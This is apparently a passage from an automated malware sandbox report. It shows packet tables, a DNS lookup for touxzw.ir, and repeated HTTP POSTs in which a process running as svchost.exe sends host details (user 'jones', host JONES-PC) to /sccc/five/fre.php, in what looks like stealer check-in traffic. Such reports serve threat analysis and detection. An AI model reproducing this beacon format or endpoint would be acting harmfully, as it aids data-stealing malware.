                              Feb 20, 2025 03:44:40.528512955 CET4995880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:40.529413939 CET8049958104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:40.529463053 CET4995880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:40.533588886 CET8049958104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:41.702842951 CET4997380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:41.709501982 CET8049973104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:41.709698915 CET4997380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:41.711992025 CET4997380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:41.717864037 CET8049973104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:41.717938900 CET4997380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:41.723023891 CET8049973104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:42.375356913 CET8049973104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:42.375593901 CET4997380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:42.377259016 CET8049973104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:42.377321005 CET4997380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:42.380786896 CET8049973104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:43.541484118 CET4998680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:43.546560049 CET8049986104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:43.546792984 CET4998680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:43.548425913 CET4998680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:43.553795099 CET8049986104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:43.553868055 CET4998680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:43.558932066 CET8049986104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:44.228435993 CET8049986104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:44.228842974 CET8049986104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:44.228853941 CET4998680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:44.228941917 CET4998680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:44.276000977 CET8049986104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:45.403678894 CET4999980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:45.408778906 CET8049999104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:45.410855055 CET4999980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:45.412970066 CET4999980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:45.417984009 CET8049999104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:45.418211937 CET4999980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:45.423207045 CET8049999104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:46.211839914 CET8049999104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:46.211857080 CET8049999104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:46.211967945 CET4999980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:46.212276936 CET4999980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:46.217279911 CET8049999104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:47.354126930 CET5001380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:47.360059977 CET8050013104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:47.360138893 CET5001380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:47.362063885 CET5001380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:47.367743969 CET8050013104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:47.367804050 CET5001380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:47.373626947 CET8050013104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:48.129391909 CET8050013104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:48.129550934 CET5001380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:48.129771948 CET8050013104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:48.129826069 CET5001380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:48.135821104 CET8050013104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:49.307396889 CET5002780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:49.312567949 CET8050027104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:49.312644005 CET5002780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:49.314848900 CET5002780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:49.319931030 CET8050027104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:49.319993973 CET5002780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:49.325037956 CET8050027104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:50.017230988 CET8050027104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:50.017620087 CET5002780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:50.017836094 CET8050027104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:50.018274069 CET5002780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:50.023195982 CET8050027104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:51.257488012 CET5004180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:51.262662888 CET8050041104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:51.262742043 CET5004180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:51.264692068 CET5004180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:51.269745111 CET8050041104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:51.269807100 CET5004180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:51.274940014 CET8050041104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:52.086555958 CET8050041104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:52.086657047 CET5004180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:52.086962938 CET8050041104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:52.087028980 CET5004180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:52.091744900 CET8050041104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:53.238917112 CET5005380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:53.244096041 CET8050053104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:53.244493961 CET5005380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:53.246336937 CET5005380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:53.251389980 CET8050053104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:53.251485109 CET5005380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:53.256541014 CET8050053104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:54.030165911 CET8050053104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:54.030291080 CET5005380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:54.031982899 CET8050053104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:54.032037973 CET5005380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:54.035382986 CET8050053104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:55.435472965 CET5005680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:55.440798998 CET8050056104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:55.440892935 CET5005680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:55.442614079 CET5005680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:55.447711945 CET8050056104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:55.447771072 CET5005680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:55.452848911 CET8050056104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:56.235663891 CET8050056104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:56.235775948 CET5005680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:56.236459017 CET8050056104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:56.236510038 CET5005680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:56.242975950 CET8050056104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:57.385402918 CET5005780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:57.390791893 CET8050057104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:57.390868902 CET5005780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:57.392328978 CET5005780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:57.397478104 CET8050057104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:57.397582054 CET5005780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:57.402654886 CET8050057104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:58.216435909 CET8050057104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:58.216630936 CET5005780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:58.218620062 CET8050057104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:58.218669891 CET5005780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:58.222822905 CET8050057104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:59.356652975 CET5005880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:59.361937046 CET8050058104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:59.362010956 CET5005880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:59.363951921 CET5005880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:59.368994951 CET8050058104.21.64.1192.168.2.4
                              Feb 20, 2025 03:44:59.369050026 CET5005880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:44:59.374082088 CET8050058104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:00.181344986 CET8050058104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:00.181509972 CET5005880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:00.182147026 CET8050058104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:00.182199955 CET5005880192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:00.186635017 CET8050058104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:01.368074894 CET5005980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:01.373451948 CET8050059104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:01.373542070 CET5005980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:01.390707970 CET5005980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:01.395821095 CET8050059104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:01.395935059 CET5005980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:01.401072025 CET8050059104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:02.154589891 CET8050059104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:02.154762030 CET5005980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:02.154932022 CET8050059104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:02.154983044 CET5005980192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:02.160342932 CET8050059104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:03.323556900 CET5006080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:03.329006910 CET8050060104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:03.329088926 CET5006080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:03.330809116 CET5006080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:03.335886955 CET8050060104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:03.336004972 CET5006080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:03.341087103 CET8050060104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:04.175951004 CET8050060104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:04.177119970 CET8050060104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:04.177292109 CET5006080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:04.183718920 CET5006080192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:04.188919067 CET8050060104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:05.447444916 CET5006180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:05.452756882 CET8050061104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:05.452862978 CET5006180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:05.454601049 CET5006180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:05.459819078 CET8050061104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:05.459883928 CET5006180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:05.466892958 CET8050061104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:06.106306076 CET8050061104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:06.106555939 CET5006180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:06.106921911 CET8050061104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:06.106977940 CET5006180192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:06.111884117 CET8050061104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:07.262002945 CET5006280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:07.267272949 CET8050062104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:07.267354965 CET5006280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:07.269330025 CET5006280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:07.274444103 CET8050062104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:07.274491072 CET5006280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:07.279577017 CET8050062104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:08.243223906 CET8050062104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:08.243365049 CET5006280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:08.243845940 CET8050062104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:08.243891954 CET5006280192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:08.248496056 CET8050062104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:09.411355019 CET5006380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:09.417018890 CET8050063104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:09.417247057 CET5006380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:09.418967009 CET5006380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:09.424988031 CET8050063104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:09.425071955 CET5006380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:09.431243896 CET8050063104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:10.160115957 CET8050063104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:10.160329103 CET5006380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:10.160712957 CET8050063104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:10.160770893 CET5006380192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:10.165479898 CET8050063104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:11.324737072 CET5006480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:11.330849886 CET8050064104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:11.330929995 CET5006480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:11.332679033 CET5006480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:11.338383913 CET8050064104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:11.338443995 CET5006480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:11.343576908 CET8050064104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:12.131237984 CET8050064104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:12.131377935 CET5006480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:12.131870985 CET8050064104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:12.131921053 CET5006480192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:12.136493921 CET8050064104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:13.283030987 CET5006580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:13.288527012 CET8050065104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:13.288623095 CET5006580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:13.290354967 CET5006580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:13.295434952 CET8050065104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:13.295501947 CET5006580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:13.300592899 CET8050065104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:14.083281994 CET8050065104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:14.083484888 CET5006580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:14.083779097 CET8050065104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:14.083832979 CET5006580192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:14.088586092 CET8050065104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:15.268640041 CET5006680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:15.276714087 CET8050066104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:15.276793003 CET5006680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:15.278754950 CET5006680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:15.286535025 CET8050066104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:15.286586046 CET5006680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:15.293909073 CET8050066104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:16.100430012 CET8050066104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:16.100548983 CET5006680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:16.101772070 CET8050066104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:16.101864100 CET5006680192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:16.105933905 CET8050066104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:17.285442114 CET5006780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:17.290777922 CET8050067104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:17.291043043 CET5006780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:17.293014050 CET5006780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:17.298113108 CET8050067104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:17.298172951 CET5006780192.168.2.4104.21.64.1
                              Feb 20, 2025 03:45:17.303354979 CET8050067104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:18.100327969 CET8050067104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:18.101185083 CET8050067104.21.64.1192.168.2.4
                              Feb 20, 2025 03:45:18.101249933 CET5006780192.168.2.4104.21.64.1
                              TimestampSource PortDest PortSource IPDest IP
                              Feb 20, 2025 03:43:14.427531004 CET5173653192.168.2.41.1.1.1
                              Feb 20, 2025 03:43:14.516443014 CET53517361.1.1.1192.168.2.4
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Feb 20, 2025 03:43:14.427531004 CET192.168.2.41.1.1.10xfffbStandard query (0)touxzw.irA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Feb 20, 2025 03:43:14.516443014 CET1.1.1.1192.168.2.40xfffbNo error (0)touxzw.ir104.21.64.1A (IP address)IN (0x0001)false
                              Feb 20, 2025 03:43:14.516443014 CET1.1.1.1192.168.2.40xfffbNo error (0)touxzw.ir104.21.32.1A (IP address)IN (0x0001)false
                              Feb 20, 2025 03:43:14.516443014 CET1.1.1.1192.168.2.40xfffbNo error (0)touxzw.ir104.21.112.1A (IP address)IN (0x0001)false
                              Feb 20, 2025 03:43:14.516443014 CET1.1.1.1192.168.2.40xfffbNo error (0)touxzw.ir104.21.48.1A (IP address)IN (0x0001)false
                              Feb 20, 2025 03:43:14.516443014 CET1.1.1.1192.168.2.40xfffbNo error (0)touxzw.ir104.21.96.1A (IP address)IN (0x0001)false
                              Feb 20, 2025 03:43:14.516443014 CET1.1.1.1192.168.2.40xfffbNo error (0)touxzw.ir104.21.16.1A (IP address)IN (0x0001)false
                              Feb 20, 2025 03:43:14.516443014 CET1.1.1.1192.168.2.40xfffbNo error (0)touxzw.ir104.21.80.1A (IP address)IN (0x0001)false
                              • touxzw.ir
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449731104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:14.527729988 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 176
                              Connection: close
                              Feb 20, 2025 03:43:14.532929897 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: 'ckav.rujones210979JONES-PCk0FDD42EE188E931437F4FBE2CzRz2e
                              Feb 20, 2025 03:43:15.323247910 CET811INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kq2Gao6aEEVU4YpaEjla0YSI9MrTb3dwHgz3P5hruyZep6sj0a2Bwqn%2FQ%2BdEOyPsIwUePpHFx6ThnmwPq6oisYgBrc%2BSitf6d1Qee7GeJyOIwzsJSjA5lDs3eUM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b25e25fc642eb-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449732104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:16.473067999 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 176
                              Connection: close
                              Feb 20, 2025 03:43:16.479029894 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: 'ckav.rujones210979JONES-PC+0FDD42EE188E931437F4FBE2CeiESo
                              Feb 20, 2025 03:43:17.388662100 CET819INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrSMNXPssx75MUalSnsg7GGncYtEB31%2BUEm4TUsGX%2F%2Fd4Dj8SeNW2BMsSm7aMn76e%2BVvjHyUxaCKoGfILgUalKtjSWih0ITWaqbEVErdJDqQ5DsRiIghbG43k58%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b25ef1d0f7ca5-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=124916&min_rtt=124916&rtt_var=62458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449733104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:17.446084023 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:17.451575041 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:18.278176069 CET843INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:18 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MyLI3q7%2FAEOJv4GlrNlYTiCQRgiyxnh%2BEoQ1hr9ZIcqWeb3kpwB%2BQJRxH9gRPeJen0HO2Z9bwVoYGx8lg8r4eVI3RZY4LLiFRu6R7mdvmJaU8Nzy5F4u7liCOjo%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b25f49d5f8c36-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=9478&min_rtt=9478&rtt_var=4739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449734104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:19.436868906 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:19.442017078 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:20.266947985 CET848INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E69wBaMWeoagsgbyqtg2l%2Bh8jjaynx96ZNg8eikSyd%2BZQyE1A9jTtUdRvjSe%2B2PS9UFORklS%2Fw4QEuN3kqsp6vcFNro8fepSUN4Jw5%2Fk6tL4Ya29C%2BzPXQZGAQU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26011dbb0f49-EWR
                              alt-svc: h3=":443"; ma=86400
